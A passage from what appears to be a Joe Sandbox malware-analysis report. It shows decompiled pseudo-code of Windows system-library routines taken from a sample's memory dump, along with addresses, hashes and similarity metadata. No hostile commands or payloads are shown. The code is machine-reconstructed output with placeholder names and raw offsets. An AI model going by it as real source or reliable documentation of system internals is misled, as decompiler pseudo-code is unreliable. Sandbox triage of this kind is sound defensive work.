													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = L00AC75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0xba8638; // 0x0
																	_t122 = L00AC38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			L00AC76E2(_t154);
																			goto L41;
																		}
																	} else {
																		L00AC76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L00AEFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L00AC70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = L00AEFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = L00AEFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = L00AEFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = L00AEFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = L00AEFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0xba7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0xba7b84 = _t75;
						_t73 = L00ACEB70(_t134, 0xba7b60);
						if( *0xba7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = L00ACFF60( *0xba7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                            0x00aefab0
                            0x00aefab2
                            0x00aefab3
                            0x00aefab4
                            0x00aefabc
                            0x00aefac0
                            0x00aefb14
                            0x00aefb17
                            0x00aefac2
                            0x00aefac8
                            0x00aefacd
                            0x00aefad3
                            0x00aefad3
                            0x00aefadd
                            0x00aefb18
                            0x00aefb1b
                            0x00aefb1d
                            0x00aefb1e
                            0x00aefb1f
                            0x00aefb20
                            0x00aefb21
                            0x00aefb22
                            0x00aefb23
                            0x00aefb24
                            0x00aefb25
                            0x00aefb26
                            0x00aefb27
                            0x00aefb28
                            0x00aefb29
                            0x00aefb2a
                            0x00aefb2b
                            0x00aefb2c
                            0x00aefb2d
                            0x00aefb2e
                            0x00aefb2f
                            0x00aefb3a
                            0x00aefb3b
                            0x00aefb3e
                            0x00aefb41
                            0x00aefb44
                            0x00aefb47
                            0x00aefb4a
                            0x00aefb4d
                            0x00aefb53
                            0x00b2bdcb
                            0x00b2bdcb
                            0x00aefb59
                            0x00aefb5b
                            0x00aefb5b
                            0x00aefb5e
                            0x00b2bdd5
                            0x00b2bdd8
                            0x00000000
                            0x00b2bdda
                            0x00000000
                            0x00b2bdda
                            0x00aefb64
                            0x00aefb64
                            0x00aefb64
                            0x00aefb67
                            0x00aefb6e
                            0x00aefb70
                            0x00aefb72
                            0x00000000
                            0x00aefb78
                            0x00aefb7a
                            0x00aefb7a
                            0x00aefb7d
                            0x00aefb80
                            0x00b2bddf
                            0x00b2bde1
                            0x00000000
                            0x00b2bde3
                            0x00000000
                            0x00b2bde3
                            0x00aefb86
                            0x00aefb86
                            0x00aefb86
                            0x00aefb8b
                            0x00aefb90
                            0x00aefb92
                            0x00aefb94
                            0x00aefb9a
                            0x00aefb9b
                            0x00aefba1
                            0x00b2bde8
                            0x00b2bdeb
                            0x00b2bded
                            0x00b2beb5
                            0x00b2beb5
                            0x00b2bebb
                            0x00b2bebd
                            0x00b2bec3
                            0x00b2bed2
                            0x00b2bedd
                            0x00b2bedd
                            0x00b2beed
                            0x00000000
                            0x00b2bdf3
                            0x00b2bdfe
                            0x00b2be06
                            0x00b2be0b
                            0x00b2be0d
                            0x00b2be0f
                            0x00b2be14
                            0x00b2be19
                            0x00b2be20
                            0x00b2be25
                            0x00b2be27
                            0x00b2be35
                            0x00b2be39
                            0x00b2be46
                            0x00b2be4f
                            0x00b2be54
                            0x00b2be56
                            0x00b2bef8
                            0x00b2bef8
                            0x00000000
                            0x00b2be5c
                            0x00b2be5c
                            0x00b2be60
                            0x00000000
                            0x00b2be66
                            0x00b2be66
                            0x00b2be7f
                            0x00b2be84
                            0x00b2be87
                            0x00b2be89
                            0x00b2be8b
                            0x00b2be99
                            0x00b2be9d
                            0x00b2bea0
                            0x00b2beac
                            0x00b2beaf
                            0x00b2beb1
                            0x00b2beb3
                            0x00b2beb3
                            0x00000000
                            0x00b2bea2
                            0x00b2bea2
                            0x00000000
                            0x00b2bea2
                            0x00b2be8d
                            0x00b2be8d
                            0x00b2be92
                            0x00000000
                            0x00b2be92
                            0x00b2be8b
                            0x00b2be60
                            0x00b2be3b
                            0x00b2be3b
                            0x00b2be3e
                            0x00000000
                            0x00b2be40
                            0x00b2be40
                            0x00b2be44
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b2be44
                            0x00b2be3e
                            0x00b2be29
                            0x00b2be29
                            0x00000000
                            0x00b2be29
                            0x00b2be27
                            0x00000000
                            0x00aefba7
                            0x00aefba7
                            0x00aefbab
                            0x00b2bf02
                            0x00aefbb1
                            0x00aefbb1
                            0x00aefbb8
                            0x00aefbbd
                            0x00aefbbd
                            0x00aefbbf
                            0x00aefbbf
                            0x00aefbc5
                            0x00aefbcb
                            0x00aefbf8
                            0x00aefbf8
                            0x00aefbfa
                            0x00000000
                            0x00aefc00
                            0x00aefc00
                            0x00aefc03
                            0x00000000
                            0x00aefc09
                            0x00aefc09
                            0x00aefc0f
                            0x00aefc15
                            0x00aefc23
                            0x00aefc23
                            0x00aefc25
                            0x00aefc27
                            0x00aefc75
                            0x00aefc7c
                            0x00aefc84
                            0x00000000
                            0x00aefc29
                            0x00aefc29
                            0x00aefc2d
                            0x00aefc30
                            0x00b2bf0f
                            0x00000000
                            0x00aefc36
                            0x00aefc38
                            0x00aefc3b
                            0x00aefc41
                            0x00b2bf17
                            0x00b2bf19
                            0x00b2bf48
                            0x00b2bf4b
                            0x00000000
                            0x00b2bf1b
                            0x00b2bf22
                            0x00b2bf24
                            0x00b2bf26
                            0x00000000
                            0x00b2bf2c
                            0x00b2bf37
                            0x00b2bf39
                            0x00b2bf3b
                            0x00000000
                            0x00b2bf41
                            0x00b2bf41
                            0x00b2bf41
                            0x00b2bf41
                            0x00b2bf45
                            0x00000000
                            0x00b2bf45
                            0x00b2bf3b
                            0x00b2bf26
                            0x00000000
                            0x00aefc47
                            0x00aefc47
                            0x00aefc49
                            0x00aefcb2
                            0x00aefcb4
                            0x00aefcb6
                            0x00aefcdc
                            0x00aefcdc
                            0x00000000
                            0x00aefcb8
                            0x00aefcc3
                            0x00aefcc5
                            0x00aefcc7
                            0x00000000
                            0x00aefcc9
                            0x00aefcc9
                            0x00aefccd
                            0x00000000
                            0x00aefccd
                            0x00aefcc7
                            0x00000000
                            0x00aefc4b
                            0x00aefc4b
                            0x00aefc4e
                            0x00aefc4e
                            0x00aefc51
                            0x00aefc51
                            0x00aefc54
                            0x00aefc5a
                            0x00aefc5c
                            0x00aefc5f
                            0x00aefc61
                            0x00aefc63
                            0x00aefc65
                            0x00aefc67
                            0x00aefc6e
                            0x00aefc72
                            0x00aefc72
                            0x00aefc72
                            0x00aefc72
                            0x00aefc67
                            0x00aefc61
                            0x00000000
                            0x00aefc5a
                            0x00aefc49
                            0x00aefc41
                            0x00aefc30
                            0x00aefc27
                            0x00aefc03
                            0x00aefbcd
                            0x00aefbd3
                            0x00aefbd9
                            0x00aefbdc
                            0x00aefbde
                            0x00aefc99
                            0x00aefc9b
                            0x00aefc9d
                            0x00aefcd5
                            0x00aefcd5
                            0x00aefc89
                            0x00aefc89
                            0x00000000
                            0x00aefc9f
                            0x00aefc9f
                            0x00aefca3
                            0x00000000
                            0x00aefca3
                            0x00000000
                            0x00aefbe4
                            0x00aefbe4
                            0x00aefbe4
                            0x00aefbe4
                            0x00aefbe9
                            0x00aefbf2
                            0x00000000
                            0x00aefbf2
                            0x00aefbde
                            0x00aefbcb
                            0x00aefbab
                            0x00aefc8b
                            0x00aefc8b
                            0x00aefc8c
                            0x00aefb80
                            0x00aefb72
                            0x00aefb5e
                            0x00aefc8d
                            0x00aefc91
                            0x00aefadf
                            0x00aefadf
                            0x00aefae1
                            0x00aefae4
                            0x00aefae7
                            0x00aefaec
                            0x00aefaf8
                            0x00aefb00
                            0x00aefb07
                            0x00aefb0f
                            0x00aefb0f
                            0x00aefb07
                            0x00000000
                            0x00aefaf8
                            0x00aefadd

                            Strings
                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00B2BE0F
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                            • API String ID: 0-865735534
                            • Opcode ID: 53295eb1f59aa57edafd7932f0ae1c16d8d3c4de8f7313345958187c83a1a74a
                            • Instruction ID: 446e82c4fcbaa4b3ec08336589f29d4b74790a895f94a7750b6f01c2718c46db
                            • Opcode Fuzzy Hash: 53295eb1f59aa57edafd7932f0ae1c16d8d3c4de8f7313345958187c83a1a74a
                            • Instruction Fuzzy Hash: 0BA1D471B006998FDB25DB69C850BBAB3F5EB84710F2545BDE90ADB691DF30DC018B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AB52A5, Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                            Download Yara Rule
                            C-Code - Quality: 78%
                            			E00AB52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					L00ACEEF0(0xba79a0);
					_t104 =  *0xba8210; // 0x652d38
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					L00ACEB70(_t93, 0xba79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E00AF9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									L00ACEEF0(0xba79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									L00ACEB70(0, 0xba79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x652d45
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E00AEF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									L00ACEEF0(0xba79a0);
									__eflags =  *0xba8210 - _t104; // 0x652d38
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0xba8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E00B34888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										L00ACEB70(_t95, 0xba79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E00AF95D0();
											L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E00AF95D0();
											L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									L00ACEB70(_t93, 0xba79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E00AF95D0();
										L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E00AF95D0();
										L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E00AEF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                            0x00ab52a5
                            0x00ab52ad
                            0x00ab52b0
                            0x00ab52b3
                            0x00ab52b7
                            0x00ab52ba
                            0x00ab52bf
                            0x00ab52c4
                            0x00ab52cc
                            0x00000000
                            0x00000000
                            0x00ab52ce
                            0x00ab52d9
                            0x00ab52dd
                            0x00ab52e7
                            0x00ab52f7
                            0x00ab52f9
                            0x00ab52fd
                            0x00b10dcf
                            0x00b10dd5
                            0x00b10dd6
                            0x00b10dd7
                            0x00b10dd8
                            0x00b10dd9
                            0x00b10dde
                            0x00b10ddf
                            0x00b10de0
                            0x00b10de1
                            0x00b10de2
                            0x00b10de5
                            0x00b10dea
                            0x00b10dec
                            0x00b10f60
                            0x00b10f64
                            0x00b10f70
                            0x00b10f76
                            0x00b10f79
                            0x00b10f79
                            0x00000000
                            0x00b10f64
                            0x00b10df2
                            0x00b10df7
                            0x00b10e04
                            0x00b10e0d
                            0x00b10e0d
                            0x00b10e10
                            0x00b10e1a
                            0x00b10e1c
                            0x00b10e4c
                            0x00b10e52
                            0x00b10e61
                            0x00b10e67
                            0x00b10e6b
                            0x00b10e70
                            0x00b10e76
                            0x00b10ed7
                            0x00b10edc
                            0x00b10ee0
                            0x00b10ee6
                            0x00b10eea
                            0x00b10eed
                            0x00b10ef0
                            0x00b10ef3
                            0x00b10ef6
                            0x00b10ef9
                            0x00b10efe
                            0x00b10f01
                            0x00b10f01
                            0x00b10f0b
                            0x00b10f12
                            0x00b10f16
                            0x00b10f18
                            0x00b10f1b
                            0x00b10f2c
                            0x00b10f31
                            0x00b10f31
                            0x00b10f35
                            0x00b10f39
                            0x00b10f3a
                            0x00b10f3c
                            0x00b10f3f
                            0x00b10f50
                            0x00b10f55
                            0x00b10f55
                            0x00b10f59
                            0x00ab52eb
                            0x00ab52f1
                            0x00ab52f1
                            0x00b10e7d
                            0x00b10e84
                            0x00b10e88
                            0x00b10e8a
                            0x00b10e8d
                            0x00b10e9e
                            0x00b10ea3
                            0x00b10ea3
                            0x00b10ea7
                            0x00b10eaf
                            0x00b10eb3
                            0x00b10eb9
                            0x00b10eb9
                            0x00b10ebc
                            0x00b10ecd
                            0x00b10ecd
                            0x00000000
                            0x00b10eb3
                            0x00b10e21
                            0x00b10e2b
                            0x00b10e2f
                            0x00b10e30
                            0x00b10e3a
                            0x00b10e3f
                            0x00b10e41
                            0x00000000
                            0x00000000
                            0x00b10e47
                            0x00000000
                            0x00b10e47
                            0x00b10df9
                            0x00b10dfe
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b10dfe
                            0x00ab5303
                            0x00ab5307
                            0x00000000
                            0x00ab5309
                            0x00000000
                            0x00ab5309
                            0x00ab5307
                            0x00ab52e9
                            0x00ab52e9
                            0x00000000
                            0x00ab52e9
                            0x00ab530e
                            0x00000000

                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8-e
                            • API String ID: 0-3368788482
                            • Opcode ID: 580063145c5a348a555ab7d8e13bd1deb82fa39555f866211657e6a9d6c02994
                            • Instruction ID: daa204f42cdffb71f973ba03b4d4d3481059d41e3c94cc16a08857ca60e3fa4b
                            • Opcode Fuzzy Hash: 580063145c5a348a555ab7d8e13bd1deb82fa39555f866211657e6a9d6c02994
                            • Instruction Fuzzy Hash: F551DF31649741AFC321EF64C942BA7BBE8FF54710F14095EF49587652EB70E884CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AEF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                            Download Yara Rule
                            C-Code - Quality: 75%
                            			E00AEF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E00AD4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E00AF9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E00AF9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E00AF95D0();
							goto L11;
						} else {
							_t109 = L00AD4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E00AFF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E00AF95D0();
										L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                            0x00aef0d3
                            0x00aef0d9
                            0x00aef0e0
                            0x00aef0e7
                            0x00aef0f2
                            0x00aef0f4
                            0x00aef0f8
                            0x00aef100
                            0x00aef108
                            0x00aef10d
                            0x00aef115
                            0x00aef116
                            0x00aef11f
                            0x00aef123
                            0x00aef124
                            0x00aef12c
                            0x00aef130
                            0x00aef134
                            0x00aef13d
                            0x00aef144
                            0x00aef14b
                            0x00aef152
                            0x00b2bab0
                            0x00b2bab0
                            0x00aef158
                            0x00aef158
                            0x00aef15a
                            0x00aef160
                            0x00aef165
                            0x00aef166
                            0x00aef16f
                            0x00aef173
                            0x00b2baa7
                            0x00b2baa7
                            0x00b2baab
                            0x00000000
                            0x00aef179
                            0x00aef18d
                            0x00aef191
                            0x00b2baa2
                            0x00000000
                            0x00aef197
                            0x00aef19b
                            0x00aef1a2
                            0x00aef1a9
                            0x00aef1af
                            0x00aef1b2
                            0x00aef1b6
                            0x00aef1b9
                            0x00aef1c4
                            0x00aef1d8
                            0x00aef1df
                            0x00aef1e3
                            0x00aef1eb
                            0x00aef1ee
                            0x00aef1f4
                            0x00aef20f
                            0x00b2bab7
                            0x00b2babb
                            0x00b2bacc
                            0x00b2bad1
                            0x00aef215
                            0x00aef218
                            0x00aef226
                            0x00aef22b
                            0x00000000
                            0x00aef22b
                            0x00aef1f6
                            0x00aef1f6
                            0x00aef1f9
                            0x00aef1fb
                            0x00aef1fb
                            0x00aef1f4
                            0x00aef191
                            0x00aef173
                            0x00aef152
                            0x00aef203

                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                            • Instruction ID: c446d26f36ca1780117a42ebed183a1f6a1657d5793e98906fca3470986391d3
                            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                            • Instruction Fuzzy Hash: 22517C715047149FC321DF59C841A6BB7F8FF48710F108A2EFA9687691EBB4E904CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B33884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                            Download Yara Rule
                            C-Code - Quality: 72%
                            			E00B33884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = L00AF9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L00AD4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = L00AF9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
